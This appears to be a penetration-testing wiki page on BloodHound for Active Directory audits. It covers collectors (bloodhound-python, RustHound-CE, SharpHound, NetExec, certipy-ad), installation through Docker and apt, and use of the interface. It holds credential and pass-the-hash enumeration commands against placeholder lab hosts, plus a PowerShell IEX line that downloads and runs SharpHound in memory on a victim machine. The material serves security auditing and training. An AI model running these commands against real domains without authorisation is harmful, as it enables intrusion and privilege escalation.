🐶Bloodhound

Introduction

BloodHound is a fundamental tool in Active Directory audits, designed to identify trust relationships and potential attack vectors within a domain. It allows analysts to understand how an attacker could move laterally or escalate privileges by leveraging existing relationships between domain objects.

This section focuses on explaining the different data collection methods available (collectors), comparing their usage and applicability based on the environment. Additionally, we'll detail the installation process and key differences between classic BloodHound and BloodHound Community Edition (CE).

Throughout this guide, we'll cover:

Different collectors and their usage:

SharpHound.exe: The classic executable
SharpHound.ps1: Ideal for environments with PowerShell enabled
bloodhound-python: Designed for execution from Linux systems
RustHound-CE: The modern collector optimized for BH-CE
NetExec: Allows basic relationship extraction directly from Linux
certipy-ad: Focused on detecting relationships within AD CS environments, exporting in BloodHound CE compatible format

When to use each collector

Step-by-step installation for both classic BloodHound and BloodHound CE

Practical use cases in real audits or simulated environments

The objective is to clearly document how to work with BloodHound, integrate it into an audit, and maximize its capabilities.

Collectors

For BloodHound to generate a useful and accurate domain graph, it's first necessary to perform an information collection phase. This task falls to the collectors, which are responsible for extracting structural data from the Active Directory environment: relationships between users and groups, active sessions, delegations, object permissions, among others.

Several collectors are currently available, each designed to adapt to different operational scenarios, privilege levels, or environment restrictions. Choosing the appropriate collector depends on both the technical context and the analysis objectives.

In this section, we document the main collectors used in AD audits, including their installation, execution, and particularities:

SharpHound.exe: The classic executable for Windows environments
SharpHound.ps1: PowerShell alternative useful in environments with more restrictive policies
bloodhound-python: Cross-platform collector, ideal for collection from Linux systems
RustHound-CE: Designed for BloodHound Community Edition, with a more modular and efficient approach

This section aims to serve as a practical reference for selecting and using the most appropriate collector based on the environment and audit objectives.

⚠️ VERY IMPORTANT!
Whenever we obtain a new user, it's recommended to run the BloodHound collector again with those credentials. It's possible that the first user had limited permissions to enumerate the domain, and with the new one we can obtain more relationships or privileges that weren't visible before.
Therefore, with each new account, the ideal is to execute another collector and generate a new .zip with updated environment information.

bloodhound-python

Installation

Via APT

sudo apt install bloodhound-python -y

Via PIP

pip install bloodhound

Via PIPX

pipx install bloodhound

Via cloning repository

git clone https://github.com/dirkjanm/BloodHound.py
pip install .

Resources:

Usage

It's recommended to synchronize time with the DC first to avoid KRB_AP_ERR_SKEW issues.

sudo timedatectl set-ntp 0
sudo ntpdate -s 10.10.10.10

Username and password authentication

bloodhound-python -u 'user' -p 'Gzzcoo123' -d 'domain.htb' -ns 10.10.10.10 -dc 'dc01.domain.htb' --zip -c All

Pass-the-Hash (PtH) authentication

bloodhound-python -u 'user' --hashes ':fbaa3e2294376dc0f5aeb6b41ffa52b7' -d 'domain.htb' -ns 10.10.10.10 -dc 'dc01.domain.htb' --zip -c All

Kerberos authentication (.ccache)

bloodhound-python -u 'user' -k -no-pass -d 'domain.htb' -ns 10.10.10.10 -dc 'dc01.domain.htb' --zip -c All --auth-method kerberos

RustHound-CE

Installation

You need to have Rust installed on Kali. You can follow this blog to install it.

Once Rust is installed on your system, install RustHound-CE with the following command:

cargo install rusthound-ce

Resource:

GitHub - g0h4n/RustHound-CE

Usage

Username and password authentication

rusthound -d domain.htb -i 10.10.10.10 -u 'user@domain.htb' -p 'Password01!' -z --adcs --old-bloodhound

Kerberos authentication (.ccache)

rusthound -d domain.htb -i 10.10.10.10 -k -f dc01.domain.htb -z --adcs --old-bloodhound

SharpHound.ps1

Resource:

BloodHound-Legacy/Collectors/SharpHound.ps1

Import SharpHound.ps1 into memory

Import SharpHound.ps1 through a web server hosting the PS1 script (can be your own attacker server)

IEX(New-Object Net.WebClient).downloadString("https://raw.githubusercontent.com/SpecterOps/BloodHound-Legacy/master/Collectors/SharpHound.ps1")

Having the PowerShell script on the victim machine, you can import it as follows

. .\SharpHound.ps1

Import-Module .\SharpHound.ps1

Collect information through SharpHound.ps1

Invoke-BloodHound -CollectionMethods All -Domain contoso.com

SharpHound.exe

Resource:

GitHub - SpecterOps/SharpHound

Transfer the binary to the victim machine and execute it to collect information.

.\SharpHound.exe --CollectionMethods All

NetExec

Username and password authentication

nxc ldap 10.10.10.10 -u 'user' -p 'Password01!' --bloodhound --collection All --dns-server 10.10.10.10

Pass-the-Hash (PtH) authentication

nxc ldap 10.10.10.10 -u 'user' -H 'fbaa3e2294376dc0f5aeb6b41ffa52b7' --bloodhound --collection All --dns-server 10.10.10.10

Kerberos authentication (.ccache)

nxc ldap dc.domain.htb --use-kcache --bloodhound --collection All --dns-server 10.10.10.10

certipy-ad

BloodHound CE

Username and password authentication

LDAP (Port 389)

certipy-ad find -u 'user@domain.htb' -p 'Password01!' -bloodhound -dc-ip 10.10.10.10 -scheme ldap

LDAPS (Port 636)

certipy-ad find -u 'user@domain.htb' -p 'Password01!' -bloodhound -dc-ip 10.10.10.10

Pass-the-Hash (PtH) authentication

LDAP (Port 389)

certipy-ad find -u 'user@domain.htb' -hashes ':fbaa3e2294376dc0f5aeb6b41ffa52b7' -bloodhound -dc-ip 10.10.10.10 -scheme ldap

LDAPS (Port 636)

certipy-ad find -u 'user@domain.htb' -hashes ':fbaa3e2294376dc0f5aeb6b41ffa52b7' -bloodhound -dc-ip 10.10.10.10

Kerberos authentication (.ccache)

LDAP (Port 389)

certipy-ad find -k -no-pass -bloodhound -target dc.domain.htb -dc-ip 10.10.10.10 -debug -scheme ldap

LDAPS (Port 636)

certipy-ad find -k -no-pass -bloodhound -target dc.domain.htb -dc-ip 10.10.10.10 -debug

Old BloodHound

Username and password authentication

LDAP (Port 389)

certipy-ad find -u 'user@domain.htb' -p 'Password01!' -old-bloodhound -dc-ip 10.10.10.10 -scheme ldap

LDAPS (Port 636)

certipy-ad find -u 'user@domain.htb' -p 'Password01!' -old-bloodhound -dc-ip 10.10.10.10

Pass-the-Hash (PtH) authentication

LDAP (Port 389)

certipy-ad find -u 'user@domain.htb' -hashes ':fbaa3e2294376dc0f5aeb6b41ffa52b7' -old-bloodhound -dc-ip 10.10.10.10 -scheme ldap

LDAPS (Port 636)

certipy-ad find -u 'user@domain.htb' -hashes ':fbaa3e2294376dc0f5aeb6b41ffa52b7' -old-bloodhound -dc-ip 10.10.10.10

Kerberos authentication (.ccache)

LDAP (Port 389)

certipy-ad find -k -no-pass -old-bloodhound -target dc.domain.htb -dc-ip 10.10.10.10 -debug -scheme ldap

LDAPS (Port 636)

certipy-ad find -k -no-pass -old-bloodhound -target dc.domain.htb -dc-ip 10.10.10.10 -debug

BloodHound Community Edition (CE)

Installation

Update repositories and install docker-compose on your system.

sudo apt update -y && sudo apt install docker-compose -y

Download the docker-compose.yml file with cURL and verify it downloaded correctly.

curl -L https://ghst.ly/getbhce -o docker-compose.yml

You can also create the docker-compose.yml content directly:

docker-compose.yml

# Copyright 2023 Specter Ops, Inc.
#
# Licensed under the Apache License, Version 2.0
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0

services:
  app-db:
    image: docker.io/library/postgres:16
    environment:
      - PGUSER=${POSTGRES_USER:-bloodhound}
      - POSTGRES_USER=${POSTGRES_USER:-bloodhound}
      - POSTGRES_PASSWORD=${POSTGRES_PASSWORD:-bloodhoundcommunityedition}
      - POSTGRES_DB=${POSTGRES_DB:-bloodhound}
    # Database ports are disabled by default. Please change your database password to something secure before uncommenting
    # ports:
    #   - 127.0.0.1:${POSTGRES_PORT:-5432}:5432
    volumes:
      - postgres-data:/var/lib/postgresql/data
    healthcheck:
      test:
        [
          "CMD-SHELL",
          "pg_isready -U ${POSTGRES_USER:-bloodhound} -d ${POSTGRES_DB:-bloodhound} -h 127.0.0.1 -p 5432"
        ]
      interval: 10s
      timeout: 5s
      retries: 5
      start_period: 30s

  graph-db:
    image: docker.io/library/neo4j:4.4.42
    environment:
      - NEO4J_AUTH=${NEO4J_USER:-neo4j}/${NEO4J_SECRET:-bloodhoundcommunityedition}
      - NEO4J_dbms_allow__upgrade=${NEO4J_ALLOW_UPGRADE:-true}
    # Database ports are disabled by default. Please change your database password to something secure before uncommenting
    ports:
      - 127.0.0.1:${NEO4J_DB_PORT:-7687}:7687
      - 127.0.0.1:${NEO4J_WEB_PORT:-7474}:7474
    volumes:
      - ${NEO4J_DATA_MOUNT:-neo4j-data}:/data
    healthcheck:
      test:
        [
          "CMD-SHELL",
          "wget -O /dev/null -q http://localhost:7474 || exit 1"
        ]
      interval: 10s
      timeout: 5s
      retries: 5
      start_period: 30s

  bloodhound:
    image: docker.io/specterops/bloodhound:${BLOODHOUND_TAG:-latest}
    environment:
      - bhe_disable_cypher_complexity_limit=${bhe_disable_cypher_complexity_limit:-false}
      - bhe_enable_cypher_mutations=${bhe_enable_cypher_mutations:-false}
      - bhe_graph_query_memory_limit=${bhe_graph_query_memory_limit:-2}
      - bhe_database_connection=user=${POSTGRES_USER:-bloodhound} password=${POSTGRES_PASSWORD:-bloodhoundcommunityedition} dbname=${POSTGRES_DB:-bloodhound} host=app-db
      - bhe_neo4j_connection=neo4j://${NEO4J_USER:-neo4j}:${NEO4J_SECRET:-bloodhoundcommunityedition}@graph-db:7687/
      - bhe_recreate_default_admin=${bhe_recreate_default_admin:-false}
      - bhe_graph_driver=${GRAPH_DRIVER:-neo4j}
      ### Add additional environment variables you wish to use here.
      ### For common configuration options that you might want to use environment variables for, see `.env.example`
      ### example: bhe_database_connection=${bhe_database_connection}
      ### The left side is the environment variable you're setting for bloodhound, the variable on the right in `${}`
      ### is the variable available outside of Docker
    ports:
      ### Default to localhost to prevent accidental publishing of the service to your outer networks
      ### These can be modified by your .env file or by setting the environment variables in your Docker host OS
      - ${BLOODHOUND_HOST:-127.0.0.1}:${BLOODHOUND_PORT:-8080}:8080
    ### Uncomment to use your own bloodhound.config.json to configure the application
    # volumes:
    #   - ./bloodhound.config.json:/bloodhound.config.json:ro
    depends_on:
      app-db:
        condition: service_healthy
      graph-db:
        condition: service_healthy

volumes:
  neo4j-data:
  postgres-data:

Start the containers defined in the docker-compose.yml file.

sudo docker-compose up -d

Verify that the containers are running and there haven't been any failures.

sudo docker ps

Check the initial password in the logs.

sudo docker logs bloodhound-ce_bloodhound_1

Access http://localhost:8080 and use the following credentials:

Username: admin
Password: Initial password obtained in the previous step

Enter the initial password in the first field, and the new password that must meet the established requirements.

Typically 12 characters minimum, 1 uppercase, 1 lowercase, 1 number and 1 special symbol.

You now have BloodHound CE correctly installed on your system through Docker.

Start BloodHound CE

In my case, I have the docker-compose.yml file in the /opt/BloodHound-CE directory. This way, regardless of which directory I'm in, I can start it directly with the following command.

To start BloodHound-CE, you must have the containers already installed as indicated in the previous steps.

The command sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml up -d is used to start the containers from scratch, which is useful if there are modifications to the docker-compose.yml. In our case, we won't modify it, so we should use start to launch it.

sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml start

Stop BloodHound CE

To stop BloodHound-CE, run the following command, thus freeing the ports it uses, etc. Then we can start it with the previous command or with sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml start

sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml stop

Ingest Data

To upload our information collected through the Collectors, we need to go to http://localhost:8080. Once we're in the BloodHound-CE panel, we'll perform the following steps:

Go to the "Administration" section
Access the "File Ingest" tab
Click on "Upload File(s)"
Click inside the box or drag our .zip or individual JSON files directly
Select our compressed file
Once our file is selected, click the Upload option
Confirm that the message appears indicating they have been uploaded correctly. Click Close
Verify that after the collected data is integrated correctly, it appears as Complete. If another state like Cancelled appears, re-upload the file. If the problem persists, it's highly likely that the problem is with the compatibility of the Collector used, try another one.

Once everything is uploaded, we can use BloodHound-CE and navigate the interface.

Erase Data

When we need to delete the "database" that BloodHound-CE has from previously uploaded data, we must delete the data. We can do a "deep cleaning" to leave no trace of the uploaded data. To do this, we'll perform the following steps:

Access the "Administration" section
Go to the "Database Management" section
Check all boxes for "deep cleaning"
Click the "Proceed" option
Enter the keyword to confirm deletion "Please delete my data"
Once the confirmation word is entered, click "Confirm"

How to Use BloodHound CE

Once we have uploaded our data to BloodHound-CE, we can navigate the interface by accessing the "Explore" section.

Search

In the SEARCH section, we can search for a node/object we want to query. If it doesn't appear, it means it doesn't exist or wasn't found during information collection (probably due to permissions issues).

Click Node Info

When clicking on a node/object, the following menu with different submenus of the node/object will appear in the right sidebar, which we'll investigate below.

We have several sub-sections, although the most relevant for now are:

Object Information
Member Of
Outbound Object Control
Inbound Object Control

In the Object Information section, all the node/object information will appear. Among the information we can highlight:

Distinguished Name
Whether the user has DONT_REQ_PREAUTH (i.e., susceptible to AS-REP Roast)
Whether it's enabled

Pathfinding

The Pathfinding functionality in BloodHound CE allows searching for attack paths from a starting node to a target, evaluating privileges and relationships between users and groups.

In this example, we start from OLIVIA@ADMINISTRATOR.HTB, which has GenericAll over MICHAEL@ADMINISTRATOR.HTB, allowing total control over that account. In turn, MICHAEL can force a password change for BENJAMIN@ADMINISTRATOR.HTB, completing the attack chain.

This type of view is key to identifying real paths for privilege escalation or lateral movements within the domain.

Edges

In BloodHound CE, edges represent relationships between domain objects. These relationships can be of different types: group membership (MemberOf), delegations (GetChanges, GenericAll, etc.), active sessions, ACLs, and many others.

When we click on an edge, a panel opens with more detail about that relationship. This panel includes different sections:

General
Windows Abuse
Linux Abuse
References

Shows a technical description of the detected relationship.

Marking Objects as Owned/High Value

BloodHound CE allows manually marking domain objects as Owned (compromised) or High Value (priority targets). This helps us better visualize audit progress and focus path analysis on critical assets.

These marks are applied from right-clicking on the node. Once marked, the node is visually highlighted in the graph with a corresponding icon.

Owned: We mark a node as compromised when we already have control over it (for example, if we get credentials or remote execution).

High Value: We mark high-value targets that are critical to our objectives.

In the Group Management panel, we can manage objects marked as Owned or High Value in an organized way. Its use is summarized in the following steps:

Access the Group Management section from the people icon (left sidebar)
Select the group we want to review Owned/High Value
Choose the environment, normally All Active Directory Domains
Apply filters if we want to see only certain types of nodes (User, Group or Computer, etc.)
The list of objects belonging to that group is displayed, along with their type and status
By clicking on a node, its detailed information is displayed on the right: name, SID, OS, last logon, delegations, etc.

This section allows visual control of compromised objectives and planning next movements within the domain.

Cypher Queries

In this section, we can launch queries in Cypher language to query relationships within the BloodHound graph. It's very useful for searching attack paths or listing critical objects more precisely.

BloodHound CE already comes with several predefined queries, such as:

Kerberoastable users
Shortest paths to Domain Admins
List of all Domain Admins
Principals with dangerous privileges (DCSync, GenericAll, etc.)

We can also modify these queries or create our own based on what we need to search for in the environment.

Custom Queries

BloodHound CE allows creating and saving our own queries in Cypher. This gives us flexibility to search for specific relationships in the graph and reuse those searches in future audits.

In the following GitHub repository, we have some already created Queries that we can add:

bloodhoundce-resources/custom_queries

In this case, we put the QUERY we want to consult, click "Save Query", assign a name to the QUERY, and verify that it's saved. Clicking on it will perform the assigned query.

Classic BloodHound

Installation

Update repositories and install BloodHound and Neo4j for BloodHound to work correctly.

sudo apt update -y && sudo apt install bloodhound neo4j -y

Open Neo4j in a separate terminal, the web interface will start at http://localhost:7474

sudo neo4j console

Access http://localhost:7474 and enter the following default credentials:

Username: neo4j
Password: neo4j

It will ask you to change the password.

Once you've modified the Neo4j password, open BloodHound in the background in a new terminal.

bloodhound > /dev/null 2>&1 & disown

Enter the neo4j user and the new modified credentials. You can save credentials for automatic connection.

Once you log in, BloodHound will start correctly and you can navigate within it.

Start BloodHound and Neo4j

To start BloodHound once the installation is complete, execute the following commands.

In a separate terminal, open Neo4j. You should wait for the output line indicating that the web interface is enabled at http://localhost:7474

sudo neo4j console

Open BloodHound in the background. If you have stored credentials with the check, it will log in automatically.

bloodhound > /dev/null 2>&1 & disown

PreviousAttacking Kerberos NextTools

Last updated 7 months ago